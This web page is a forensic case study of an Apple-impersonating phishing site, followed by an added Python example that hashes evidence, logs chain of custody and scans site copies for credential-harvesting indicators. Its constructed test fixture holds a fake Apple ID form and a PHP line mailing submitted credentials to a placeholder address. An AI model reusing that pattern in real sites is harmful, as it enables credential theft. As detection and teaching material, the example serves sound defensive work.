CASE STUDY: Website Phishing Attack

December 9, 2015 | Views: 5494


1. Case Summary:
Mrs. Poornima Rai, working as a Social Media Strategist at a firm called ‘Next Gen Digital System,’ received an email with a promotional offer attached to it. She is an intelligent person who has always loved listening to music and reading books over coffee. She also has some knowledge of attacks carried out through email and their effects.

Mrs. Pinky Sharma, CEO of ‘Next Gen Digital System,’ called up Mr. Amar Chhetri, a certified Computer Forensic Investigator and expert, and asked for his forensic services to perform an investigation to verify whether the email was a simple marketing promotion campaign or something else, and to start legal action with the help of the law enforcement authorities.


2. Forensic Methodology:
a. Amar Chhetri accepted the investigation task and visited Mrs. Sujan’s office on a working day.
b. He created a bit-stream image of the folder on the HDD that contains the Outlook .pst files using FTK Imager.
c. He also created MD5 hashes of the image to cross-check the integrity of the file during the investigation and the court trial.
d. He moved the acquired image file into a folder protected and encrypted by TrueCrypt.
e. He prepared Chain-of-Custody documents and stored the evidence in a forensically secure place/device.
f. Mr. Amar was requested to investigate the following points of evidence:
i. The nature of the site linked from the email
ii. The behavior of the URL received
iii. The impact of the programs behind the URL
g. He loaded the image file into FTK from the password-protected folder in the TrueCrypt volume and secured the loaded contents with encryption and a passcode.
h. An FTK search located the reported URL in the mail system loaded from the acquired evidence.
i. He tried to verify the phishing nature of the URL using http://phishtank.com, but could not get any confirmatory details, as the site was not listed in PhishTank’s database.
j. He did a DNS analysis of the domain in the URL using www.dnsstuff.com and www.webdnstools.com.
k. He gathered the registrant details of the domain using SmartWhois and http://www.register.com/whois.rcmx.
l. He also gathered the web hosting company’s details using IPNetInfo.
m. He decided to perform forensic analysis of the source code in two modes: online, and as additionally acquired evidence.
n. He installed Firebug on Firefox and found some suspicious PHP and JavaScript code on the page.
o. Further, he installed HTTrack Website Copier and acquired the source code as additional evidence.
p. In detailed analysis, he found that the URL was programmed to collect the username, password and phone number of Apple users and to send them to a programmed email address: admin.rajut@gmail.com.
q. He prepared a report using MS Word as well as FTK and concluded that the URL was a phishing site impersonating Apple and that its code had malicious intent.
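Two steps in this methodology reduce naturally to code: step (c), the integrity hashes and chain-of-custody record for the acquired image, and step (p), the analysis of the acquired page source for credential harvesting. The script below is an added example written for this page; it is not the investigator's tooling (FTK Imager, Firebug and HTTrack did this work in the case), and the evidence bytes, the two-file site copy and the address harvester@example.invalid are constructed placeholders. It records SHA-256 beside the MD5 the case used, since MD5 collisions are practical today.

```python
"""
Added example (not the case study's own tooling). Two analyst steps as code:
  (c) integrity hashes plus a chain-of-custody record for an acquired image
  (p) a scan of an acquired site copy for credential-harvesting indicators
All sample data in this file is constructed for the example.
"""
import hashlib
import re
from datetime import datetime, timezone

# ---- Step (c): integrity of the acquired image ----------------------------

def hash_bytes(data: bytes) -> dict:
    """MD5 (what the case study used) plus SHA-256, which a current examiner
    records alongside it because MD5 collisions are practical."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}

def verify_integrity(data: bytes, recorded: dict) -> bool:
    """True only if every digest recorded at acquisition still matches."""
    current = hash_bytes(data)
    return all(current.get(algo) == value for algo, value in recorded.items())

def custody_entry(item_id: str, action: str, custodian: str, data: bytes) -> dict:
    """One chain-of-custody record: who did what to which item, when, and the
    digests computed at that moment, so every later handler can re-verify."""
    return {"item": item_id, "action": action, "custodian": custodian,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            **hash_bytes(data)}

# Constructed stand-in for the imaged .pst folder (not real evidence).
SAMPLE_IMAGE = b"constructed placeholder for an FTK Imager bit-stream image\n"
RECORDED_DIGESTS = hash_bytes(SAMPLE_IMAGE)  # noted down at acquisition time

# ---- Step (p): indicators of a credential-harvesting page -----------------

INDICATORS = {
    # a login form that submits to a server-side script
    "password_field": re.compile(r'<input[^>]+type\s*=\s*["\']?password', re.I),
    "form_post_php": re.compile(r'<form[^>]+action\s*=\s*["\']?[^"\'>\s]+\.php', re.I),
    # server-side code that mails whatever was submitted to a fixed address
    "mail_call": re.compile(r'\bmail\s*\('),
    "hardcoded_email": re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+'),
    # the brand the page is dressed up as (Apple in the case study)
    "brand_mention": re.compile(r'\bapple\b', re.I),
}

def scan_source(text: str) -> dict:
    """Count each indicator in one file; keep the actual addresses found."""
    hits = {}
    for name, pattern in INDICATORS.items():
        found = pattern.findall(text)
        if found:
            hits[name] = sorted(set(found)) if name == "hardcoded_email" else len(found)
    return hits

def scan_site(files: dict) -> dict:
    """Merge per-file findings across an acquired site copy (path -> contents)."""
    merged = {}
    for _path, text in files.items():
        for name, value in scan_source(text).items():
            if name == "hardcoded_email":
                merged[name] = sorted(set(merged.get(name, [])) | set(value))
            else:
                merged[name] = merged.get(name, 0) + value
    return merged

def classify(findings: dict) -> str:
    """The case study's pattern is a credential form plus exfiltration by mail
    to a fixed address; either half alone only justifies manual review."""
    harvests = "password_field" in findings and "form_post_php" in findings
    exfiltrates = "mail_call" in findings and "hardcoded_email" in findings
    if harvests and exfiltrates:
        return "credential-harvesting phishing kit"
    if harvests or exfiltrates:
        return "suspicious: review manually"
    return "no harvesting indicators"

# Constructed two-file site copy resembling what step (p) describes; the
# address is a placeholder, not the one named in the case study.
SAMPLE_SITE = {
    "index.html": (
        '<h1>Sign in with your Apple ID</h1>\n'
        '<form action="login.php" method="post">\n'
        '  <input type="text" name="appleid">\n'
        '  <input type="password" name="pw">\n'
        '  <input type="tel" name="phone">\n'
        '</form>\n'
    ),
    "login.php": (
        '<?php\n'
        '$to = "harvester@example.invalid";\n'
        'mail($to, "New entry", print_r($_POST, true));\n'
    ),
}

if __name__ == "__main__":
    print("image intact:", verify_integrity(SAMPLE_IMAGE, RECORDED_DIGESTS))
    print(custody_entry("E-001", "acquired", "examiner", SAMPLE_IMAGE))
    findings = scan_site(SAMPLE_SITE)
    print(findings)
    print(classify(findings))
```

The regex indicators are deliberately coarse: every legitimate login page has a password field posting to a script, so `classify` only escalates to a verdict when the form and the mail-to-fixed-address exfiltration both appear in the same acquired copy, and anything less is queued for the kind of manual review the investigator did with Firebug. The custody record stores the digests with each handling event so that a later custodian can re-run `verify_integrity` rather than trust the previous entry.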


3. Trials and Prosecution:
Based on the evidence prepared and produced, the registrant, who had himself programmed the site, was sentenced to a 3-year jail term under various IT laws, including misuse of electronic communication.


Researched and Authored by:
Amrit Chhetri, Principal IT Security Consultant, Certified Computer Forensics Investigator/Consultant, CPT, Social Media Consultant

8 Comments
  1. Awesome narrative.

  2. Nice write-up, interesting to see EH principles at work in the ‘real world’.

  3. Great {y}
